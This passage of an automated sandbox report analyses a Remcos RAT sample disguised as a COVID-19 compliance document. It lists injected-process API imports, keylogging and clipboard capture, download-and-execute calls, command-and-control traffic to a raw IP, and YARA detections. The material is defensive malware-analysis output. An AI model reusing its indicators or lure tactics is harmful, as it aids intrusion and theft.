std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040728F
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_0040477E
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00403325
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_00412BEE
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch12_2_00403C4A
              Source: global trafficTCP traffic: 192.168.2.5:49738 -> 216.38.7.225:7082
              Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
              Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
              Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: unknownTCP traffic detected without corresponding DNS query: 216.38.7.225
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00402149
              Source: unknownDNS traffic detected: queries for: discord.com
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeString found in binary or memory: http://ocsp.comodoca.com0
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Contains functionality to capture and log keystrokesShow sources
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Esc] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Enter] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Tab] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Down] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Right] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Up] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Left] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [End] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F2] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F1] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D2A6
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D2A6
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,12_2_0040532D

              E-Banking Fraud:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.498610658.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 4944, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 1004, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 1496, type: MEMORY
              Source: Yara matchFile source: 23.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
              Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
              Source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.498610658.0000000010540000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
              Source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
